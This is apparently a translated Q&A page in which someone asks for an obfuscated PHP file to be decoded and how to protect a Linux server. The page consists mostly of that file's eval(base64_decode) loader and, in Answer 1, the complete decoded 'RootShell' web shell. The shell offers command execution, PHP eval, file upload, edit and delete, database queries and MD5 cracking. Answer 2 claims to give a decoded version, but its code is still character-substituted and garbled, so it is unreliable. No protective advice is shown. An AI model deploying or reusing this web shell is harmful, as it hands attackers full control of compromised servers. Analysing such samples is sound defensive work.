TAgdzRkdGg9NjAwJT48dGQ+PGI+VXBsMjFkIGY0bDU8L2I+PGJyPjxmMnJtIDVuY3R5cDU9XCJtM2x0NHAxcnQvZjJybS1kMXQxXCIgMWN0NDJuPVwiIi4kbTUuIj9kNHI9Ii5yNTFscDF0aCgnLicpLiJcIiBtNXRoMmQ9XCJQT1NUXCI+DQo8NG5wM3QgdHlwNT1cImg0ZGQ1blwiIG4xbTU9XCJNQVhfRklMRV9TSVpFXCIgdjFsMzU9XCI2MDAwMDAwMDBcIiAvPjw0bnAzdCBzNHo1PW8wIG4xbTU9XCIzcGwyMWQ1ZGY0bDVcIiB0eXA1PVwiZjRsNVwiIC8+DQo8NG5wM3QgdHlwNT1cInMzYm00dFwiIHYxbDM1PVwiVXBsMjFkIEY0bDVcIiAvPg0KPC9mMnJtPjwvdGQ+PHRkPjxmMnJtIDFjdDQybj1cIiIuJG01LiJcIiBtNXRoMmQ9R0VUPjxiPkNoMW5nNSBENHI1Y3Qycnk8YnI+PC9iPjw0bnAzdCB0eXA1PXQ1eHQgczR6NT11MCBuMW01PWQ0ciB2MWwzNT1cIiIucjUxbHAxdGgoJy4nKS4iXCI+PDRucDN0IHR5cDU9czNibTR0IHYxbDM1PVwiQ2gxbmc1IEQ0cjVjdDJyeVwiPjwvZjJybT48L3RkPg0KPHRyPjx0ZD48ZjJybSAxY3Q0Mm49XCIiLiRtNS4iXCIgbTV0aDJkPUdFVD48Yj5DcjUxdDUgZjRsNTxicj48L2I+PDRucDN0IHR5cDU9aDRkZDVuIG4xbTU9ZDRyIHYxbDM1PVwiIi5yNTFscDF0aCgnLicpLiJcIj48NG5wM3QgdHlwNT10NXh0IHM0ejU9dTAgbjFtNT1mNGw1IHYxbDM1PVwiIi5yNTFscDF0aCgnLicpLiJcIj48NG5wM3QgdHlwNT1oNGRkNW4gbjFtNT1wIHYxbDM1PTVkNHQ+PDRucDN0IHR5cDU9czNibTR0IHYxbDM1PVwiQ3I1MXQ1IGY0bDVcIj48L2Yycm0+DQo8L3RkPjx0ZD48ZjJybSAxY3Q0Mm49XCIiLiRtNS4iXCIgbTV0aDJkPUdFVD48Yj5DcjUxdDUgZDRyNWN0MnJ5PGJyPjwvYj48NG5wM3QgdHlwNT10NXh0IHM0ejU9dTAgbjFtNT1jcmQ0ciB2MWwzNT1cIiIucjUxbHAxdGgoJy4nKS4iXCI+PDRucDN0IHR5cDU9aDRkZDVuIG4xbTU9ZDRyIHYxbDM1PVwiIi5yNTFscDF0aCgnLicpLiJcIj48NG5wM3QgdHlwNT1oNGRkNW4gbjFtNT1wIHYxbDM1PWNyNTF0NWQ0cj48NG5wM3QgdHlwNT1zM2JtNHQgdjFsMzU9XCJDcjUxdDUgZDRyNWN0MnJ5XCI+PC9mMnJtPjwvdGQ+DQo8L3QxYmw1PiI7DQoNCn0NCg0KZjNuY3Q0Mm4gbDJnNG4oKQ0Kew0KIHByNG50ICI8dDFibDUgYjJyZDVyPTAgdzRkdGg9NjAwJSBoNTRnaHQ9NjAwJT48dGQgdjFsNGduPVwibTRkZGw1XCI+PGM1bnQ1cj4NCiA8ZjJybSAxY3Q0Mm49Ii5iMXM1bjFtNShfX0ZJTEVfXykuIiBtNXRoMmQ9XCJQT1NUXCI+PGI+UDFzc3cycmQ/PC9iPg0KIDw0bnAzdCB0eXA1PVwicDFzc3cycmRcIiBtMXhsNW5ndGg9XCJvYVwiIG4xbTU9XCJwMXNzXCI+PDRucDN0IHR5cDU9XCJzM2JtNHRcIiB2MWwzNT1cIkwyZzRuXCI+DQogPC9mMnJtPiI7DQp9DQpmM25jdDQybiByNWwyMWQoKQ0Kew0KIGg1MWQ1cigiTDJjMXQ0Mm46ICIuYjFzNW4xbTUoX19GSUxFX18pKTsNCn0NCmYzbmN0NDJuIGc1dF81eDVjM3Q0Mm5fbTV0aDJkKCkNCnsNCiA0ZihmM25jdDQybl81eDRzdHMoJ3Axc3N0aHIzJykpeyAkbSA9ICJwMXNzdGhyMyI7IH0NCiA0ZihmM25jdDQybl81eDRzdHMoJzV4NWMnKSl7ICRtID0gIjV4NWMiOyB9DQogNGYoZjNuY3Q0Mm5fNXg0c3RzKCdzaDVsbF81eDVjJykpeyAkbSA9ICJzaDVsbF8gNXg1YyI7IH0NCiA0ZihmM25jdDQybl81eDRzdHMoJ3N5c3Q1bScpKXsgJG0gPSAic3lzdDVtIjsgfQ0KIDRmKCE0c3M1dCgkbSkpIC8vTjIgbTV0aDJkIGYyM25kIDotfA0KIHsNCiAgJG0gPSAiRDRzMWJsNWQiOw0KIH0NCiByNXQzcm4oJG0pOw0KfQ0KZjNuY3Q0Mm4gNXg1YzN0NV9jMm1tMW5kKCRtNXRoMmQsJGMybW0xbmQpDQp7DQogNGYoJG01dGgyZCA9PSAicDFzc3RocjMiKQ0KIHsNCiAgcDFzc3RocjMoJGMybW0xbmQpOw0KIH0NCiANCiA1bHM1NGYoJG01dGgyZCA9PSAiNXg1YyIpDQogew0KICA1eDVjKCRjMm1tMW5kLCRyNXMzbHQpOw0KICBmMnI1MWNoKCRyNXMzbHQgMXMgJDIzdHAzdCkNCiAgew0KICAgcHI0bnQgJDIzdHAzdC4iPGJyPiI7DQogIH0NCiB9DQogDQogNWxzNTRmKCRtNXRoMmQgPT0gInNoNWxsXzV4NWMiKQ0KIHsNCiAgcHI0bnQgc2g1bGxfNXg1YygkYzJtbTFuZCk7DQogfQ0KIA0KIDVsczU0ZigkbTV0aDJkID09ICJzeXN0NW0iKQ0KIHsNCiAgc3lzdDVtKCRjMm1tMW5kKTsNCiB9DQp9DQpmM25jdDQybiBwNXJtKCRmNGw1KQ0Kew0KIDRmKGY0bDVfNXg0c3RzKCRmNGw1KSkNCiB7DQogIHI1dDNybiBzM2JzdHIoc3ByNG50ZignJTInLCBmNGw1cDVybXMoJGY0bDUpKSwgLXUpOw0KIH0NCiA1bHM1DQogew0KICByNXQzcm4gIj8/Pz8iOw0KIH0NCn0NCmYzbmN0NDJuIGc1dF9jMmwycigkZjRsNSkNCnsNCjRmKDRzX3dyNHQxYmw1KCRmNGw1KSkgeyByNXQzcm4gImdyNTVuIjt9DQo0ZighNHNfd3I0dDFibDUoJGY0bDUpICYmIDRzX3I1MWQxYmw1KCRmNGw1KSkgeyByNXQzcm4gIndoNHQ1Ijt9DQo0ZighNHNfd3I0dDFibDUoJGY0bDUpICYmICE0c19yNTFkMWJsNSgkZjRsNSkpIHsgcjV0M3JuICJyNWQiO30NCiANCn0NCmYzbmN0NDJuIHNoMndfZDRycygkd2g1cjUpDQp7DQogNGYoNXI1ZygiXmM6IixyNTFscDF0aCgkd2g1cjUpKSkNCiB7DQogJGQ0cnAxcnRzID0gNXhwbDJkNSgnXFwnLHI1MWxwMXRoKCR3aDVyNSkpOw0KIH0NCiA1bHM1DQogew0KICRkNHJwMXJ0cyA9IDV4cGwyZDUoJy8nLHI1MWxwMXRoKCR3aDVyNSkpOw0KIH0NCiANCiANCiANCiAkNCA9IDA7DQogJHQydDFsID0gIiI7DQogDQogZjJyNTFjaCgkZDRycDFydHMgMXMgJHAxcnQpDQogew0KICAkcCA9IDA7DQogICRwcjUgPSAiIjsNCiAgd2g0bDUoJHAgIT0gJDQpDQogIHsNCiAgICRwcjUgLj0gJGQ0cnAxcnRzWyRwXS4iLyI7DQogICAkcCsrOw0KICAgDQogIH0NCiAgJHQydDFsIC49ICI8MSBocjVmPVwiIi5iMXM1bjFtNShfX0ZJTEVfXykuIj9kNHI9Ii4kcHI1LiRwMXJ0LiJcIj4iLiRwMXJ0LiI8LzE+LyI7DQogICQ0Kys7DQogfQ0KIA0KIHI1dDNybiAiPGhhPiIuJHQydDFsLiI8L2hhPjxicj4iOw0KfQ0KcHI0bnQgJGYyMnQ1cjsNCi8vIEV4NHQ6IG0xeWI1IHc1J3I1IDRuY2wzZDVkIHMybTV3aDVyNSAxbmQgdzUgZDJuJ3QgdzFudCB0aDUgMnRoNXIgYzJkNSB0MiBtNXNzIHc0dGggMjNycyA6LSkNCjV4NHQoKTsNCj8+DQog';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?> 

可以帮我的文件
解码，并告诉我如何保护服务器Linux的编码壳

Answer 1

这是解码的脚本

?><?php 
error_reporting(0); //If there is an error, we'll show it, k? 
$password = ""; // You can put a md5 string here too, for plaintext passwords: max 31 chars. 
$me = basename('the actual path of this script'); 
$cookiename = "wieeeee"; 

if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh? 
{ 
if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5. 
{ 
    $_POST['pass'] = md5($_POST['pass']); 
} 
if($_POST['pass'] == $password) 
{ 
    setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in 
} 
reload(); 
} 

if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password)) 
{ 
login(); 
die(); 
} 
// 
//Do not cross this line! All code placed after this block can't be executed without being logged in! 
// 
if(isset($_GET['p']) && $_GET['p'] == "logout") 
{ 
setcookie ($cookiename, "", time() - 3600); 
reload(); 
} 
if(isset($_GET['dir'])) 
{ 
chdir($_GET['dir']); 
} 

$pages = array(
'cmd' => 'Execute Command', 
'eval' => 'Evaluate PHP', 
'mysql' => 'MySQL Query', 
'chmod' => 'Chmod File', 
'phpinfo' => 'PHPinfo', 
'md5' => 'md5 cracker', 
'headers' => 'Show headers', 
'logout' => 'Log out' 
); 
//The header, like it? 
$header = '<html> 
<title>'.getenv("HTTP_HOST").' ~ Shell I</title> 
<head> 
<style> 
td { 
font-size: 12px; 
font-family: verdana; 
color: #33FF00; 
background: #000000; 
} 
#d { 
background: #003000; 
} 
#f { 
background: #003300; 
} 
#s { 
background: #006300; 
} 
#d:hover 
{ 
background: #003300; 
} 
#f:hover 
{ 
background: #003000; 
} 
pre { 
font-size: 10px; 
font-family: verdana; 
color: #33FF00; 
} 
a:hover { 
text-decoration: none; 
} 

input,textarea,select { 
border-top-width: 1px; 
font-weight: bold; 
border-left-width: 1px; 
font-size: 10px; 
border-left-color: #33FF00; 
background: #000000; 
border-bottom-width: 1px; 
border-bottom-color: #33FF00; 
color: #33FF00; 
border-top-color: #33FF00; 
font-family: verdana; 
border-right-width: 1px; 
border-right-color: #33FF00; 
} 
hr { 
color: #33FF00; 
background-color: #33FF00; 
height: 5px; 
} 
</style> 
</head> 
<body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900"> 
<table width=100%><td id="header" width=100%> 
<p align=right><b>[<a href="http://www.rootshell-team.info">RootShell</a>] [<a href="'.$me.'">Home</a>] '; 
foreach($pages as $page => $page_name) 
{ 
$header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] '; 
} 
$header .= '<br><hr>'.show_dirs('.').'</td><tr><td>'; 
print $header; 
$footer = '<tr><td><hr><center>&copy; <a href="http://www.ironwarez.info">Iron</a> & <a href="http://www.rootshell-team.info">RootShell Security Group</a></center></td></table></body></head></html>'; 

// 
//Page handling 
// 
if(isset($_REQUEST['p'])) 
{ 
    switch ($_REQUEST['p']) { 

    case 'cmd': //Run command 

    print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>"; 
    if(isset($_REQUEST['command'])) 
    { 
     print "<pre>"; 
     execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that? 
    } 
    break; 


    case 'edit': //Edit a fie 
    if(isset($_POST['editform'])) 
    { 
    $f = $_GET['file']; 
    $fh = fopen($f, 'w') or print "Error while opening file!"; 
    fwrite($fh, $_POST['editform']) or print "Couldn't save file!"; 
    fclose($fh); 
    } 
    print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">"; 

    if(file_exists($_GET['file'])) 
    { 
    $rd = file($_GET['file']); 
    foreach($rd as $l) 
    { 
     print htmlspecialchars($l); 
    } 
    } 

    print "</textarea><input type=submit value=\"Save\"></form>"; 

    break; 

    case 'delete': //Delete a file 

    if(isset($_POST['yes'])) 
    { 
    if(unlink($_GET['file'])) 
    { 
     print "File deleted successfully."; 
    } 
    else 
    { 
     print "Couldn't delete file."; 
    } 
    } 


    if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes'])) 
    { 
    print "Are you sure you want to delete ".$_GET['file']."?<br> 
    <form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST> 
    <input type=hidden name=yes value=yes> 
    <input type=submit value=\"Delete\"> 
    "; 
    } 


    break; 


    case 'eval': //Evaluate PHP code 

    print "<form action=\"".$me."?p=eval\" method=POST> 
    <textarea cols=60 rows=10 name=\"eval\">"; 
    if(isset($_POST['eval'])) 
    { 
    print htmlspecialchars($_POST['eval']); 
    } 
    else 
    { 
    print "print \"Yo Momma\";"; 
    } 
    print "</textarea><br> 
    <input type=submit value=\"Eval\"> 
    </form>"; 

    if(isset($_POST['eval'])) 
    { 
    print "<h1>Output:</h1>"; 
    print "<br>"; 
    eval($_POST['eval']); 
    } 

    break; 

    case 'chmod': //Chmod file 


    print "<h1>Under construction!</h1>"; 
    if(isset($_POST['chmod'])) 
    { 
    switch ($_POST['chvalue']){ 
    case 777: 
    chmod($_POST['chmod'],0777); 
    break; 
    case 644: 
    chmod($_POST['chmod'],0644); 
    break; 
    case 755: 
    chmod($_POST['chmod'],0755); 
    break; 
    } 
    print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue']."."; 
    } 
    if(isset($_GET['file'])) 
    { 
    $content = urldecode($_GET['file']); 
    } 
    else 
    { 
    $content = "file/path/please"; 
    } 

    print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod: 
    <input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b> 
    <select name=\"chvalue\"> 
<option value=\"777\">777</option> 
<option value=\"644\">644</option> 
<option value=\"755\">755</option> 
</select><input type=submit value=\"Change\">"; 

    break; 

    case 'mysql': //MySQL Query 

    if(isset($_POST['host'])) 
    { 
    $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error()); 
    mysql_select_db($_POST['dbase']); 
    $sql = $_POST['query']; 


    $result = mysql_query($sql); 

    } 
    else 
    { 
    print " 
    This only queries the database, doesn't return data!<br> 
    <form action=\"".$me."?p=mysql\" method=POST> 
    <b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br> 
    <b>Username:<br><input type=text name=username value=\"root\" size=10><br> 
    <b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br> 
    <b>Database:<br><input type=text name=dbase value=\"test\" size=10><br> 

    <b>Query:<br></b<textarea name=query></textarea> 
    <input type=submit value=\"Query database\"> 
    </form> 
    "; 

    } 

    break; 

    case 'createdir': 
    if(mkdir($_GET['crdir'])) 
    { 
    print 'Directory created successfully.'; 
    } 
    else 
    { 
    print 'Couldn\'t create directory'; 
    } 
    break; 


    case 'phpinfo': //PHP Info 
    phpinfo(); 
    break; 


    case 'rename': 

    if(isset($_POST['fileold'])) 
    { 
    if(rename($_POST['fileold'],$_POST['filenew'])) 
    { 
     print "File renamed."; 
    } 
    else 
    { 
     print "Couldn't rename file."; 
    } 

    } 
    if(isset($_GET['file'])) 
    { 
    $file = basename(htmlspecialchars($_GET['file'])); 
    } 
    else 
    { 
    $file = ""; 
    } 

    print "Renaming ".$file." in folder ".realpath('.').".<br> 
     <form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST> 
    <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br> 
    <b>To:<br><input type=text name=filenew value=\"\" size=10><br> 
    <input type=submit value=\"Rename file\"> 
    </form>"; 
    break; 

    case 'md5': 
    if(isset($_POST['md5'])) 
    { 
    if(!is_numeric($_POST['timelimit'])) 
    { 
    $_POST['timelimit'] = 30; 
    } 
    set_time_limit($_POST['timelimit']); 
    if(strlen($_POST['md5']) == 32) 
    { 

     if($_POST['chars'] == "9999") 
     { 
     $i = 0; 
     while($_POST['md5'] != md5($i) && $i != 100000) 
     { 
     $i++; 
     } 
     } 
     else 
     { 
     for($i = "a"; $i != "zzzzz"; $i++) 
     { 
     if(md5($i == $_POST['md5'])) 
     { 
     break; 
     } 
     } 
     } 

    if(md5($i) == $_POST['md5']) 
    { 
     print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>"; 
    } 

    } 

    } 

    print "Will bruteforce the md5 
    <form action=\"".$me."?p=md5\" method=POST> 
    <b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br> 
    <b>Characters:</b><br><select name=\"chars\"> 
    <option value=\"az\">a - zzzzz</option> 
    <option value=\"9999\">1 - 9999999</option> 
    </select> 
    <b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br> 
    <input type=submit value=\"Bruteforce md5\"> 
    </form><br>*: if set_time_limit is allowed by php.ini"; 
    break; 

    case 'headers': 
    foreach(getallheaders() as $header => $value) 
    { 
    print htmlspecialchars($header . ":" . $value)."<br>"; 

    } 
    break; 
    } 
} 
else //Default page that will be shown when the page isn't found or no page is selected. 
{ 

$files = array(); 
$directories = array(); 

if(isset($_FILES['uploadedfile']['name'])) 
{ 
$target_path = realpath('.').'/'; 
$target_path = $target_path . basename($_FILES['uploadedfile']['name']); 
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { 
    print "File:". basename($_FILES['uploadedfile']['name']). 
    " has been uploaded"; 
} else{ 
    echo "File upload failed!"; 
} 
} 




print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>"; 
if ($handle = opendir('.')) 
{ 
    while (false !== ($file = readdir($handle))) 
    { 
     if(is_dir($file)) 
    { 
    $directories[] = $file; 
    } 
    else 
    { 
    $files[] = $file; 
    } 
    } 
asort($directories); 
asort($files); 
    foreach($directories as $file) 
    { 
    print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>"; 
    } 

    foreach($files as $file) 
    { 
    print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>"; 
    } 
} 
else 
{ 
    print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>"; 
} 

print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\"> 
<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" /> 
<input type=\"submit\" value=\"Upload File\" /> 
</form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td> 
<tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form> 
</td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td> 
</table>"; 

} 

function login() 
{ 
print "<table border=0 width=100% height=100%><td valign=\"middle\"><center> 
<form action=".basename('the actual path of this script')." method=\"POST\"><b>Password?</b> 
<input type=\"password\" maxlength=\"32\" name=\"pass\"><input type=\"submit\" value=\"Login\"> 
</form>"; 
} 
function reload() 
{ 
header("Location: ".basename('the actual path of this script')); 
} 
function get_execution_method() 
{ 
if(function_exists('passthru')){ $m = "passthru"; } 
if(function_exists('exec')){ $m = "exec"; } 
if(function_exists('shell_exec')){ $m = "shell_ exec"; } 
if(function_exists('system')){ $m = "system"; } 
if(!isset($m)) //No method found :-| 
{ 
    $m = "Disabled"; 
} 
return($m); 
} 
function execute_command($method,$command) 
{ 
if($method == "passthru") 
{ 
    passthru($command); 
} 

elseif($method == "exec") 
{ 
    exec($command,$result); 
    foreach($result as $output) 
    { 
    print $output."<br>"; 
    } 
} 

elseif($method == "shell_exec") 
{ 
    print shell_exec($command); 
} 

elseif($method == "system") 
{ 
    system($command); 
} 
} 
function perm($file) 
{ 
if(file_exists($file)) 
{ 
    return substr(sprintf('%o', fileperms($file)), -4); 
} 
else 
{ 
    return "????"; 
} 
} 
function get_color($file) 
{ 
if(is_writable($file)) { return "green";} 
if(!is_writable($file) && is_readable($file)) { return "white";} 
if(!is_writable($file) && !is_readable($file)) { return "red";} 

} 
function show_dirs($where) 
{ 
if(ereg("^c:",realpath($where))) 
{ 
$dirparts = explode('\\',realpath($where)); 
} 
else 
{ 
$dirparts = explode('/',realpath($where)); 
} 



$i = 0; 
$total = ""; 

foreach($dirparts as $part) 
{ 
    $p = 0; 
    $pre = ""; 
    while($p != $i) 
    { 
    $pre .= $dirparts[$p]."/"; 
    $p++; 

    } 
    $total .= "<a href=\"".basename('the actual path of this script')."?dir=".$pre.$part."\">".$part."</a>/"; 
    $i++; 
} 

return "<h2>".$total."</h2><br>"; 
} 
print $footer; 
// Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-) 
exit(); 
?> 

Answer 2

这是一个base64字符串（“==”末对于了解它的base64一个线索;））

这是已解码的字符串：

?><?php 
5rr2r_r5p2rt4ng(0); //If th5r5 4s 1n 5rr2r, w5'll sh2w 4t, k? 
$p1ssw2rd = ""; // Y23 c1n p3t 1 mdi str4ng h5r5 t22, f2r pl14nt5xt p1ssw2rds: m1x o6 ch1rs. 
$m5 = b1s5n1m5(__FILE__); 
$c22k45n1m5 = "w455555"; 

4f(4ss5t($_POST['p1ss'])) //If th5 3s5r m1d5 1 l2g4n 1tt5mpt, "p1ss" w4ll b5 s5t 5h? 
{ 
4f(strl5n($p1ssw2rd) == oa) //If th5 l5ngth 2f th5 p1ssw2rd 4s oa ch1r1ct5rs, thr51t 4t 1s 1n mdi. 
{ 
    $_POST['p1ss'] = mdi($_POST['p1ss']); 
} 
4f($_POST['p1ss'] == $p1ssw2rd) 
{ 
    s5tc22k45($c22k45n1m5, $_POST['p1ss'], t4m5()+oe00); //It's 1lr4ght, l5t h5m 4n 
} 
r5l21d(); 
} 

4f(!5mpty($p1ssw2rd) && !4ss5t($_COOKIE[$c22k45n1m5]) 2r ($_COOKIE[$c22k45n1m5] != $p1ssw2rd)) 
{ 
l2g4n(); 
d45(); 
} 
// 
//D2 n2t cr2ss th4s l4n5! All c2d5 pl1c5d 1ft5r th4s bl2ck c1n't b5 5x5c3t5d w4th23t b54ng l2gg5d 4n! 
// 
4f(4ss5t($_GET['p']) && $_GET['p'] == "l2g23t") 
{ 
s5tc22k45 ($c22k45n1m5, "", t4m5() - oe00); 
r5l21d(); 
} 
4f(4ss5t($_GET['d4r'])) 
{ 
chd4r($_GET['d4r']); 
} 

$p1g5s = 1rr1y(
'cmd' => 'Ex5c3t5 C2mm1nd', 
'5v1l' => 'Ev1l31t5 PHP', 
'mysql' => 'MySQL Q35ry', 
'chm2d' => 'Chm2d F4l5', 
'php4nf2' => 'PHP4nf2', 
'mdi' => 'mdi cr1ck5r', 
'h51d5rs' => 'Sh2w h51d5rs', 
'l2g23t' => 'L2g 23t' 
); 
//Th5 h51d5r, l4k5 4t? 
$h51d5r = '<html> 
<t4tl5>'.g5t5nv("HTTP_HOST").' ~ Sh5ll I</t4tl5> 
<h51d> 
<styl5> 
td { 
f2nt-s4z5: 6apx; 
f2nt-f1m4ly: v5rd1n1; 
c2l2r: #ooFF00; 
b1ckgr23nd: #000000; 
} 
#d { 
b1ckgr23nd: #00o000; 
} 
#f { 
b1ckgr23nd: #00oo00; 
} 
#s { 
b1ckgr23nd: #00eo00; 
} 
#d:h2v5r 
{ 
b1ckgr23nd: #00oo00; 
} 
#f:h2v5r 
{ 
b1ckgr23nd: #00o000; 
} 
pr5 { 
f2nt-s4z5: 60px; 
f2nt-f1m4ly: v5rd1n1; 
c2l2r: #ooFF00; 
} 
1:h2v5r { 
t5xt-d5c2r1t42n: n2n5; 
} 

4np3t,t5xt1r51,s5l5ct { 
b2rd5r-t2p-w4dth: 6px; 
f2nt-w54ght: b2ld; 
b2rd5r-l5ft-w4dth: 6px; 
f2nt-s4z5: 60px; 
b2rd5r-l5ft-c2l2r: #ooFF00; 
b1ckgr23nd: #000000; 
b2rd5r-b2tt2m-w4dth: 6px; 
b2rd5r-b2tt2m-c2l2r: #ooFF00; 
c2l2r: #ooFF00; 
b2rd5r-t2p-c2l2r: #ooFF00; 
f2nt-f1m4ly: v5rd1n1; 
b2rd5r-r4ght-w4dth: 6px; 
b2rd5r-r4ght-c2l2r: #ooFF00; 
} 
hr { 
c2l2r: #ooFF00; 
b1ckgr23nd-c2l2r: #ooFF00; 
h54ght: ipx; 
} 
</styl5> 
</h51d> 
<b2dy bgc2l2r=bl1ck 1l4nk="#ooCC00" vl4nk="#oo9900" l4nk="#oo9900"> 
<t1bl5 w4dth=600%><td 4d="h51d5r" w4dth=600%> 
<p 1l4gn=r4ght><b>[<1 hr5f="http://www.r22tsh5ll-t51m.4nf2">R22tSh5ll</1>] [<1 hr5f="'.$m5.'">H2m5</1>] '; 
f2r51ch($p1g5s 1s $p1g5 => $p1g5_n1m5) 
{ 
$h51d5r .= ' [<1 hr5f="?p='.$p1g5.'&d4r='.r51lp1th('.').'">'.$p1g5_n1m5.'</1>] '; 
} 
$h51d5r .= '<br><hr>'.sh2w_d4rs('.').'</td><tr><td>'; 
pr4nt $h51d5r; 
$f22t5r = '<tr><td><hr><c5nt5r>&c2py; <1 hr5f="http://www.4r2nw1r5z.4nf2">Ir2n</1> & <1 hr5f="http://www.r22tsh5ll-t51m.4nf2">R22tSh5ll S5c3r4ty Gr23p</1></c5nt5r></td></t1bl5></b2dy></h51d></html>'; 

// 
//P1g5 h1ndl4ng 
// 
4f(4ss5t($_REQUEST['p'])) 
{ 
    sw4tch ($_REQUEST['p']) { 

    c1s5 'cmd': //R3n c2mm1nd 

    pr4nt "<f2rm 1ct42n=\"".$m5."?p=cmd&d4r=".r51lp1th('.')."\" m5th2d=POST><b>C2mm1nd:</b><4np3t typ5=t5xt n1m5=c2mm1nd><4np3t typ5=s3bm4t v1l35=\"Ex5c3t5\"></f2rm>"; 
    4f(4ss5t($_REQUEST['c2mm1nd'])) 
    { 
     pr4nt "<pr5>"; 
     5x5c3t5_c2mm1nd(g5t_5x5c3t42n_m5th2d(),$_REQUEST['c2mm1nd']); //Y23 w1nt fr45s w4th th1t? 
    } 
    br51k; 


    c1s5 '5d4t': //Ed4t 1 f45 
    4f(4ss5t($_POST['5d4tf2rm'])) 
    { 
    $f = $_GET['f4l5']; 
    $fh = f2p5n($f, 'w') 2r pr4nt "Err2r wh4l5 2p5n4ng f4l5!"; 
    fwr4t5($fh, $_POST['5d4tf2rm']) 2r pr4nt "C23ldn't s1v5 f4l5!"; 
    fcl2s5($fh); 
    } 
    pr4nt "Ed4t4ng f4l5 <b>".$_GET['f4l5']."</b> (".p5rm($_GET['f4l5']).")<br><br><f2rm 1ct42n=\"".$m5."?p=5d4t&f4l5=".$_GET['f4l5']."&d4r=".r51lp1th('.')."\" m5th2d=POST><t5xt1r51 c2ls=90 r2ws=6i n1m5=\"5d4tf2rm\">"; 

    4f(f4l5_5x4sts($_GET['f4l5'])) 
    { 
    $rd = f4l5($_GET['f4l5']); 
    f2r51ch($rd 1s $l) 
    { 
     pr4nt htmlsp5c41lch1rs($l); 
    } 
    } 

    pr4nt "</t5xt1r51><4np3t typ5=s3bm4t v1l35=\"S1v5\"></f2rm>"; 

    br51k; 

    c1s5 'd5l5t5': //D5l5t5 1 f4l5 

    4f(4ss5t($_POST['y5s'])) 
    { 
    4f(3nl4nk($_GET['f4l5'])) 
    { 
     pr4nt "F4l5 d5l5t5d s3cc5ssf3lly."; 
    } 
    5ls5 
    { 
     pr4nt "C23ldn't d5l5t5 f4l5."; 
    } 
    } 


    4f(4ss5t($_GET['f4l5']) && f4l5_5x4sts($_GET['f4l5']) && !4ss5t($_POST['y5s'])) 
    { 
    pr4nt "Ar5 y23 s3r5 y23 w1nt t2 d5l5t5 ".$_GET['f4l5']."?<br> 
    <f2rm 1ct42n=\"".$m5."?p=d5l5t5&f4l5=".$_GET['f4l5']."\" m5th2d=POST> 
    <4np3t typ5=h4dd5n n1m5=y5s v1l35=y5s> 
